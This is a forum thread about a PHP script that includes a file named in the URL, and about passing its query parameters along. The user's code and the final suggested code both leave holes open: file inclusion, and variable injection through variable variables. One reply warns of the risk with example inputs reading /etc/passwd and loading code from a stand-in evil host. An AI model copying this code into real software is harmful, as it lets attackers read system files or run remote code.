hello guys,I have a php page and it's my.php my urls are like my.php?page=p.php%3Fid%3D12%26pid%3D543%26k%3D7 my.php $sayfa=urldecode($_GET['page']); // url becomes p.php?id=12&pid=543&k=7 list($phppage, $tail) = explode('?', $sayfa); // $phppage is p.php include($phppage); Code (markup): the question is how can I include the tail (?id=12&pid=543&k=7)?
$sayfa=urldecode($_GET['page']); // url becomes p.php?id=12&pid=543&k=7 list($phppage, $tail) = explode('?', $sayfa); // $phppage is p.php xfunctionx($tail); // xfunctionx turns the tail to $id=12; $pid=543; $k=7; include($phppage); Code (markup): what could xfunctionx be? :/
You have to be careful when including or requiring files with variables, otherwise you'll open up Remote/Local File Inclusion security vulnerabilities! People could fetch the page: my.php?page=/etc/passwd or: my.php?page=http://evil.server/evil.php or similar.
i'm going to use split and list functions for the security i.e if get url is hxxxp://evil.server/evil.php or any http urls list($aaa, $bbb) = split("/", $geturl); $bbb is evil.php
This is very bad idea to include the file specified by the client. Splitting by slashes is not enough. For example, what if somebody call my.php?page=my.php Tell us what do you want to achieve. Maybe we can propose some more secure solution.
As you wish parse_str($tail, $tailArray); foreach ($tailArray as $key=>$value) { ${$key} = $value; } PHP: